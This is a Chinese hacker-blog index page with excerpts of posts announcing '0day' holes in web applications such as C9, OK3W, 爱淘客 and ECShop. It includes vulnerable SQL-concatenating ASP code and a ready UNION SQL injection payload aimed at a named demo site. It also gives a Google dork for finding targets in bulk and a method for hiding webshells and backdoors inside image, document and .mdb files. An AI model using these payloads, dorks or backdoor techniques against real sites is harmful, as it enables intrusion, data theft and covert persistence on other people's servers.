预览模式: 普通 | 列表

C9静态文章发布系统漏洞 0day

看到一个叫C9静态文章发布系统的程序 只不过没仔细看过。今天下载回来一份看了下 发现了问题 在投票那里 是一个flash投票系统,flash我不懂 于是抓了个包看了下 发现是通过add.asp提交投票 xml.asp 提供rss输出 当读到这里的时候 发现了问题

代码如下: <% thisid=funstr(Trim(Request.QueryString("voteid"))) if thisid="" then set rs=conn.execute("select top 1 * from plug_vote where oorc<>false order by id desc") else set rs=conn.execute("select * from plug_vote where id="&thisid) end if if rs.eof then response.Write("连接数据发生错误"):response.End() conn.execute "update plug_vote set votevi=votevi+1 where id="&rs("id") for i=1 to 5 if isnull(rs("cs_"&i)) then exit for next nowid=rs("id") ...... %>

这里 我们看下是如何接收变量传递进来的值的 thisid=funstr(Trim(Request.QueryString("voteid"))) trim 过滤两边空格 然后是funstr这个函数 在包含文件里有个 fun/funlogic.asp 函数应该在这里 打开这个文件

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 32

OK3W文章管理系统漏洞0day

OK3W是一套文章管理系统,整套系统的程序结构是以自定义类来实现的,很有创意o(∩_∩)o...安全性还是比较好的,目前免费版4.7存在这个漏洞,官网也存在,不过不知道补了没,上次路过被发现了后台验证过程
Public Function AdminIsLogin() If Trim(AdminName) = "" Then AdminIsLogin = 0'没有登陆 Else If AdminLogin(AdminName,AdminPwd,"IsCheck")<>-1 Then AdminIsLogin = 0'Cookies错误 Else AdminIsLogin = -1'已经登陆 End If End If End Function Public Function AdminLogin(sAdminName,sAdminPwd,sType) AdminName = sAdminName Sql = "select * from Ok3w_Admin where AdminName=? and AdminPwd=?" Set AdminCmd = Server.CreateObject("Adodb.Command") AdminCmd.ActiveConnection = Conn AdminCmd.CommandType = 1 AdminCmd.CommandText = Sql AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminName",200,1,50,sAdminName)) AdminCmd.Parameters.Append(AdminCmd.CreateParameter("@AdminPwd",200,1,50,sAdminPwd)) Set AdminRs = Server.CreateObject("Adodb.RecordSet") Set AdminRs = AdminCmd.Execute response.write sAdminName&" "&sAdminPwd&"" response.write AdminCmd.CommandText Set AdminCmd = Nothing If AdminRs.Eof And AdminRs.Bof Then AdminLogin = 1'用户名或密码错误 Else If AdminRs("AdminLock") Then AdminLogin = 2'用户被锁定 Else Response.Cookies("Ok3w")("AdminId") = AdminRs("AdminId") Response.Cookies("Ok3w")("AdminName") = AdminRs("AdminName") Response.Cookies("Ok3w")("AdminPwd") = AdminRs("AdminPwd") Response.Cookies("Ok3w")("GroupId") = AdminRs("GroupId") If sType="IsLogin" Then Call AdminActionLog("成功登陆") AdminLogin = -1'成功登陆 End If End If AdminRs.Close Set AdminRs = Nothing response.write adminlogin End Function

本来我看到这里以为可以好不费力的拿下,基础过过关,这里登陆验证虽然是采用cookies验证,但是sql语句是用预编译的方式进行查询的,所以单引号这里是没用的,不能用万能密码。(感谢ninty大牛指点)

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 26

爱淘客淘宝客系统 V2.0 0day

以官方演示版(http://demo.2taoke.com)为例:此脚本程序存在一个注入漏洞,考虑到官方,具体哪个点暂时不说。 构造下面注入语句:


?id=-999.9%20UNION%20ALL%20Select%20(Select%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x3274616F6B655F64656D6F),2,3--

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 37
EXP:
-hi.baidu.com/5427518-
凹丫丫 4.7 及其以下版本通杀Xday
仅供学习研究,使用者若违反法律后果自负
说明:

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 26

天缘企业网站系统通杀0day

批量www.google.cn

inurl:Products.asp?main_id=1

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 27

ECShop 2.7.2 最新任意用户登陆漏洞0day

由于最近项目需要, 查看了下商派最新发布的ECShop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台!
漏洞的影响
ECShop 2.7.2
ECShop 2.7.1 不受影响
漏洞的出现

查看更多...

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 22

巧妙利用.mdb后缀数据库做后门

我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦 写到mp3文件里写到doc文件里都是可以的啦
copy 文件名/参数 + 文件名/参数 生成文件名


这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到

查看更多...

Tags: 后门

分类:工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 47

黑客花絮与宣言(摘)


技信无处不在,兄弟永远存在.
无兄弟不黑客,无兄弟不上线

1、哥闲得蛋疼,但不寂寞。
2、哥不在江湖,江湖都有哥的传说!

查看更多...

分类:心情日记 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 37